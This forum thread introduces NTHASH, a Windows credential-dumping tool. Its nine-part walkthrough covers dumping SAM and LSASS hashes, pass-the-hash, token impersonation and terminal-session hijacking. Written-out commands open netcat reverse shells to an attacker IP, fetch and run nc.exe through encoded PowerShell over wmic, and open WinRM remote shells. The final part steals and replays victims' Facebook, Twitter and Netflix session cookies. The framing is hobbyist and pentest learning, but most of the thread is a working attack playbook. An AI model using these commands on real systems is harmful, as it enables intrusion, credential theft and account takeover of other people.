Jump to content











Photo

NTHASH - playing with windows hashes and passwords

security passwords hash ntlm

  • Please log in to reply
10 replies to this topic

#1 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3041 posts
  • Location:Nantes - France
  •  
    France

Posted 08 October 2019 - 04:55 PM

Hello Gents,
 
For once I will step a bit from network and storage discussions/tools and will get into the security world.
 
I consider myself a security hobbyist/amateur and i have been willing to explore and improve my skills around hash (md5, sha, etc) and crypto functions (rc4, aes, 3des, etc).
 
I decided then to start playing with windows passwords as obviously MS puts great efforts in protecting these.
How are they stored, how can we decrypt them, etc.
 
I started with one common way i.e patch LSASS to dump hashes.
While rather easy, patching lsass is always risky, os dependent and not telling much about how passwords are encrypted.
Thus, doing so, I stumbled on a way (google) to change a password if you know the hash only which in some cases (pentests) may come handy.
 
While playing with lsass, I took a look at the logon and wdigest datas stored in the memory.
Here again, it is an "easy" way to retrieve passwords (some in clear text, some in hashes).
One very cool feature there is the ability to "patch" a logon session with some hashes you found previously and therefore perform what is known as a "pass the hash" attack.
You dont the password? no pb, launch a process under someone else account using the hash of his password (which combined with mstsc /restrictedadmin can help you escalate your privileges).
Lots of security guys are warning these days that the complexity of your password no longer matters : true, the security of your password hash is what does matters.
I wont touch here on capturing hashes over the network (using MITM, poisoning, etc) but that could lead to another interesting thread.
 
I then took a look at the registry.
It gets trickier here as you need a samkey, a syskey, while also using hash/encryption algos.
You want to see how it works under the hood : read this great article.
 
Since on my way to use windows builtin crypt functions, I took a look at cryptunprotectdata
which ultimatimately should lead me to decrypt windows credentials.
 
Talking about credentials, you can again patch lsass to force it to dump its passwords in clear text.
 
Last but not least, because you sometimes to impersonate another account/context to perform some actions, 
I took a quick tour around runastoken, runaschild....
 
This is only the beginning of my journey.
And for once, the journey is what matters to me here, not the destination :)
 
The source is available to all.
Binaries (x32/x64) are zipped.
This is early work : i have been testing this on win7, win8.1, win10.
In case Wonko passes by : some functions will work on xp and last time I tested it, it was running fine  B)
 
If you are not into security, dont bother this tool : it will at best bore you, at worse BSOD your windows.
If you are a pseudo hacker willing to hack his GF laptop, please, ignore me.
If you are a security hobbyist/amateur and have ideas and want to develop some features, lets be friend !
 
Before I forget : it is all on my github here (with some extra details).
 
Also, I did not invent any of it : i reused lots of tips, tricks, knowledge from fantastic guys out there willing to share and document.
Tool was also greatly inspired by Mimikatz : possibly one of the most powerful and challenging tools these last years ... and developped by another frenchie ;)
 
Cheers,
Erwan


#2 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3041 posts
  • Location:Nantes - France
  •  
    France

Posted 08 October 2019 - 06:37 PM

command line.

 

Command line as below:

NTHASH /setntlm [/server:hostname] /user:username /newhash:xxx
NTHASH /setntlm [/server:hostname] /user:username /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newhash:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newhash:xxx
NTHASH /gethash /password:password
NTHASH /getsid /user:username [/server:hostname]
NTHASH /getusers [/server:hostname]
NTHASH /getdomains [/server:hostname]
NTHASH /dumpsam
NTHASH /dumphashes [/offline]
NTHASH /getsyskey [/offline]
NTHASH /getsamkey [/offline]
NTHASH /getlsakeys
NTHASH /wdigest
NTHASH /logonpasswords
NTHASH /pth /user:username /password:myhash /domain:mydomain
NTHASH /enumcred
NTHASH /enumcred2
NTHASH /enumvault
NTHASH /chrome [/binary:path_to_database]
NTHASH /ccookies [/binary:path_to_database]
NTHASH /firefox [/binary:path_to_database]
NTHASH /fcookies [/binary:path_to_database]
NTHASH /bytetostring /input:hexabytes
NTHASH /stringtobyte /input:string
NTHASH /base64encodew /input:string
NTHASH /base64encode /input:string
NTHASH /base64decode /input:base64string
NTHASH /cryptunprotectdata /binary:filename
NTHASH /cryptunprotectdata /input:string
NTHASH /cryptprotectdata /input:string
NTHASH /runasuser /user:username /password:password [/binary:x:\folder\bin.exe]
NTHASH /runastoken /pid:12345 [/binary:x:\folder\bin.exe]
NTHASH /runaschild /pid:12345 [/binary:x:\folder\bin.exe]
NTHASH /runas [/binary:x:\folder\bin.exe]
NTHASH /runts /user:session_id [/binary:x:\folder\bin.exe]
NTHASH /enumpriv
NTHASH /enumproc
NTHASH /dumpproc /pid:12345
NTHASH /runwmi /binary:x:\folder\bin.exe [/server:hostname]
NTHASH /context
NTHASH /a_command /verbose
NTHASH /a_command /system


#3 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3041 posts
  • Location:Nantes - France
  •  
    France

Posted 31 October 2019 - 05:28 PM

Demonstrating lateral movement with NTHASH part #1

 

In 3 steps, lets retrieve some hashes and then lets perform a PTH (using MS RDP client).

If you dont know what lateral movement is, please read here.

 

1.Retrieve the hash


NTHASH-win64.exe /dumpsam
or
NTHASH-win64.exe /dumphashes /system
or
reg save hklm\sam sam.sav and reg save hklm\system system.sav
NTHASH-win64.exe /dumphashes /offline
or (in a domain env)
NTHASH-win64.exe /logonpasswords

 

2.Pass the hash


NTHASH-win64.exe /pth /user:username /password:8846F7EAEE8FB117AD06BDD830B7586C /domain:.

 

3.In the newly opened cmd « pth » shell, type mstsc /restrictedadmin /v:target

 

You will end up logged as the « username » account in a RDP console on server named « target ».

 

Try a simple whoami for fun and go back to credential harvesting for this account using /firefox, /chrome, /enumvault, /enumcred, etc.

 

And you never had to enter the account password…

 

Note that any other client tool (preferably built in windows) that inherit ntlm credentials from current logon session will work too (tasklist/taskkill, wmic, net, winrm/powershell, psexec, etc)

 

This will be covered in future posts.



#4 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3041 posts
  • Location:Nantes - France
  •  
    France

Posted 31 October 2019 - 05:28 PM

Demonstrating lateral movement with NTHASH part #2

 

In a previous post, we have seen how to perform lateral movement thru « Pass The Hash ».

Lets imagine that there is no RDP server available on the target but you still need to get a shell on the target.

Lets use a reverse shell i.e the target will connect back to us (the attacker).

Usefull as well if the firewall on the target is allowing only outbound connections.

 

1.Set a shell with netcat on the attacker host
nc -L -vv -p 9000

 

2.Copy file to target host (remember, you are using a pth shell with proper logon details).
copy nc.exe \\target\admin$

 

3.Exec netcat on target host
NTHASH-win64.exe /runwmi /server:target /binary:nc attacker_ip 9000 -e cmd.exe

 

At this point you will get a shell popup in your listening netcat.

Try a simple whoami for fun.



#5 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3041 posts
  • Location:Nantes - France
  •  
    France

Posted 31 October 2019 - 05:28 PM

Demonstrating lateral movement with NTHASH part #3

 

Lets introduce a variant of previous post.

Rather than copying a file to a target using a remote admin$ share (which is not always available), lets have the target download a file via http.

 

1.Set a shell with netcat on the attacker host
nc -L -vv -p 9000

 

2.download a file from internet on a remote target

(remember, you are using a pth shell with proper logon details).

NTHASH-win64.exe /runwmi /server:target /binary:powershell.exe -c (New-Object System.Net.WebClient).DownloadFile(‘http:%2f%2ferwan.labalec.fr%2fuploads%2fnc.exe’,’c:\temp\nc.exe’);

 

Notice the %2f in place of the ‘/’ – Indeed, we need to escape this as otherwise it would be understood as command line parameter.

 

3.Exec netcat on target host
NTHASH-win64.exe /runwmi /server:target /binary:c:\temp\nc.exe attacker_ip 9000 -e cmd.exe

 

At this point you will get a shell popup in your listening netcat.

 

Try a simple whoami for fun.



#6 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3041 posts
  • Location:Nantes - France
  •  
    France

Posted 31 October 2019 - 05:28 PM

Demonstrating lateral movement with NTHASH part #4

 

 

Lets again introduce a variant of previous post (still using a "pth" shell).

 

Ideally we would be using the windows built in wmic command rather that the nthash runwmi verb.

 

Unfortunately, wmic can be a pita with escaping characters in some situations, especially when combining with powershell.

 

The below for instance wont work because of the ‘,’ comma character.

wmic /node:target process call create "powershell.exe -c (New-Object System.Net.WebClient).DownloadFile(‘http://erwan.labalec...c:\temp\nc.exe')"

 

The trick/workaround is to base64encode (unicode) the powershell command.

NTHASH-win64.exe /base64encodew /input:(New-Object System.Net.WebClient).DownloadFile(‘http:%2f%2ferwan.labalec.fr%2fuploads%2fnc.exe’,’c:\temp\nc.exe’);

 

Which will give you the following :

KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQ
BiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBlAHIAdwBhAG4ALgBsAGEAYgBhAGwAZQBjAC4AZgByAC8AdQBwAGwAbwBhAGQAcwAvAG4AYwAuAGUAeABlACcALAAnAGMAOgBcAHQAZQBtAHAAXABuAGMALgBlAHgAZQAnACkAOwA=

 

You can then execute a powershell command on a remote target using wmic like below :

wmic /node:target process call create "powershell.exe -encodedcommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQ

BiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBlAHIAdwBhAG4ALgBsAGEAYgBhAGwAZQBjAC4AZgByAC8AdQBwAGwAbwBhAGQAcwAvAG4AYwAuAGUAeABlACcALAAnAGMAOgBcAHQAZQBtAHAAXABuAGMALgBlAHgAZQAnACkAOwA="



#7 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3041 posts
  • Location:Nantes - France
  •  
    France

Posted 31 October 2019 - 05:29 PM

Demonstrating lateral movement with NTHASH part #5

 

 

In previous post, we have introduced the used of WMIC in a « pass the hash » shell.

 

See below a list of useful wmic commands of gathered around the internet:

 

rem remember impersonate is ok but delegate is not

 

rem become familiar with the available aliases
wmic alias list brief

 

rem see the available methods for any class
wmic [class] call /?

 

rem file stuff
wmic /node:target DATAFILE where « drive=’c:’ AND path=’\\windows\\' » GET Name,readable,size
wmic /node:target datafile « c:\\temp\\test.txt » call rename c:\temp\abc.txt
wmic /node:target datafile « c:\\temp\\test.txt » call copy c:\temp\abc.txt

 

rem process stuff
wmic /node:target process call create « nc attacker-ip 9000 -e cmd.exe »
wmic /node:target process call create « cmd.exe /c echo test > c:\temp\test.txt »
wmic /node:target process where name= »explorer.exe » call terminate
wmic /node:target process where processid= »1234″ call terminate
wmic /node:target process get name, processid

 

rem users and groups stuff
wmic /node:target USERACCOUNT LIST brief
wmic /node:target path Win32_GroupUser



#8 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3041 posts
  • Location:Nantes - France
  •  
    France

Posted 31 October 2019 - 05:29 PM

Demonstrating lateral movement with NTHASH part #6

 

Last one on the « pass the hash » series.


Initially we used a remote RDP console.

 

We then demonstrated netcat reverse shell.

 

What if we dont have RDP or cant/dont want to use netcat to the remote target?

 

WinRM to the rescue !

 

1.Ensure WinRM is set on the attacker host : winrm quickconfig

 

2.Add trusted hosts * (or filter to an ip) on attacker host : powershell "Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*" -Force "

 

3.Enable psremoting on the remote target host (use wmic / see previous post) : powershell.exe "enable-psremoting -force"

 

4.Add trusted hosts * (or filter to an ip) on attacker host : powershell "Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*" -Force" (use wmic / see previous post)

 

5.Enjoy a remote shell under powershell (from the attacker host) : Enter-PSSession -ComputerName target



#9 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3041 posts
  • Location:Nantes - France
  •  
    France

Posted 31 October 2019 - 05:29 PM

Demonstrating lateral movement with NTHASH part #7

 

 

In previous posts, we have used Pass The Hass to perform lateral movement.


This time, lets drop the "pass the hash" technique and use token impersonation.

Indeed, if you are lucky enough to be a local admin you can impersonate a token owned by another user currently logged on the same system as you (it could be a terminal server).

 

That other user may happen to be admin on systems where you currently dont have access to (yet).
Impersonating this user will let you perform lateral movement.

 

This is as simple as running NTHASH-win64.exe /runastoken /pid:xxx where pid is owned by that other user.

That will spawn a new shell running under the context of another user

 

Just keep in mind that you need to be running an elevated shell to do so.
If not done yet, simply run NTHASH-win64.exe /runas before running the command above.

 

As simple as that : again, no need to know the user password (nor the hash this time).

 

Once running under the context of this other user you can then run commands like :
NTHASH-win64.exe /chrome
NTHASH-win64.exe /firefox
NTHASH-win64.exe /enumcred
NTHASH-win64.exe /enumcred2
NTHASH-win64.exe /enumvault

And keep moving lateral… or up…



#10 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3041 posts
  • Location:Nantes - France
  •  
    France

Posted 31 October 2019 - 05:29 PM

Demonstrating lateral movement with NTHASH part #8

 

In previous post we have (ab)used windows tokens to steal someone else account.

 

Lets see a different way to perform this task (ab)using terminal services.

 

1.Retrieve the session id of your victim with qwinsta

 

2.Open a shell (within the attacker session) to which your victim will connect to : nc -L -vv -p 9000

 

3.Spawn a process within your victim session which will connect back to your shell : NTHASH-win64.exe /runts /user:session_id /binary:nc 127.0.0.1 9000 -e cmd.exe

 

And again, enjoy the output of your whoami.

 

Note that you need special privileges (SeTcbPrivilege) to perform step 3 – my preference goes to using a « trustedinstaller » session (but many other context will do like winlogon, etc).

 

If need be (i.e spawn a shell with as many privileges as possible), the below batch will create a new shell with proper privileges to perform step 3 above (although you could probably use runastoken against many of the system processses like winlogonexe).
 

@echo off
net start trustedinstaller
for /F "tokens=1" %%K in (' nthash-win64 /enumproc ^| findstr /i "trustedinstaller" ') do ( nthash-win64 /runastoken /pid:%%K /system )


#11 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3041 posts
  • Location:Nantes - France
  •  
    France

Posted 31 October 2019 - 05:29 PM

Demonstrating lateral movement with NTHASH part #9

 

This is the 9th and last article of a series of posts around performing lateral movement.

I have been greatly inspired by this security matrix (check the lateral movement column).

 

Goal is still about performing a task as another user but without knowing that user's password.

 

This time, lets take a look at « cookies« .

 

Quoting Wikipedia : « …is a small piece of data sent from a website and stored on the user’s computer by the user’s web browser while the user is browsing… ».

 

1.Based on previous articles, lets consider you have acquired a context/shell running as another user.

 

2.Retrieve the chrome cookie you are after with NTHASH-win64.exe /ccookies | findstr /i facebook.com or the firefox cookie you are after with NTHASH-win64.exe /fcookies | findstr /i facebook.com

 

3.Launch a "blank" chrome with a blank profile (in your session) : "C:\Program File
s (x86)\Google\Chrome\Application\chrome" --profile-directory= "temp"

 

4.Install a « cookie » chrome extension like EditThisCookie

 

5.Inject the cookie (with editthiscookie):

-in facebook case, you need to inject value xs and c_user
-in twitter case, you need to inject auth_token
-in netflix case, you need netflixid, securenetflixid, nfvdid, cl
etc...
 

And here you go, you can log into a web service, as another user, without knowing his credentials.

 

Note that this method may not be 100% bullet proof :
-you need to know which value(s) you need to inject
-some web services may perform extra checks (MFA, etc ...)






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users